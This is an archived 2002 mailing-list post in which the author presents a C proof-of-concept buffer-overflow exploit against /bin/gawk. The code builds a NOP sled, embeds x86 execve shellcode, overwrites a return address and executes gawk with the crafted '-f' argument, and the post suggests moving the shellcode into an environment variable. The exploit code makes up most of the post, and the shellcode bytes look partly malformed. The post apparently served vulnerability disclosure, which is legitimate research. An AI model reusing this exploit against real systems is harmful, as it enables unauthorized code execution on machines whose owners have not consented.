I did a little research and found that it only accepts ASCII chars as arg, and if you try to put shellcode in the arg nothing occurs. I think if we store the shellcode in an env variable and write the ret address pointing to the env shellcode, it could work. I attach a proof I made.

/*
---------------------------------------------------------------------------
Web:     http://qb0x.net
Author:  Gabriel A. Maggiotti
Date:    March 15, 2002
E-mail:  gmaggiotat_private
---------------------------------------------------------------------------
*/

#include <stdio.h>
#include <string.h>   /* memcpy, strlen */
#include <unistd.h>   /* execl */

#define OFFSET 18215
#define NOP 0x90
#define RET_72 0xbfffc6f0
#define RET 0x41

int main(int argc, char *argv[])
{
    int i=0;
    char buf[OFFSET];
    int c, ret;

    char shellcode1[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69/bin/ls";

    ret = RET_72 - OFFSET;

    for(i=0;i<=OFFSET-1 ;i++)
        buf[i]=NOP;

    *(int *) &buf[i] = RET;

    memcpy(buf+131,shellcode1,strlen(shellcode1));

    buf[0]='-';
    buf[1]='f';
    buf[2]=' ';

    execl("/bin/gawk", "/bin/gawk", buf, NULL);
    //puts(buf);

    return 0;
}
This archive was generated by hypermail 2b30 : Fri Mar 15 2002 - 11:25:13 PST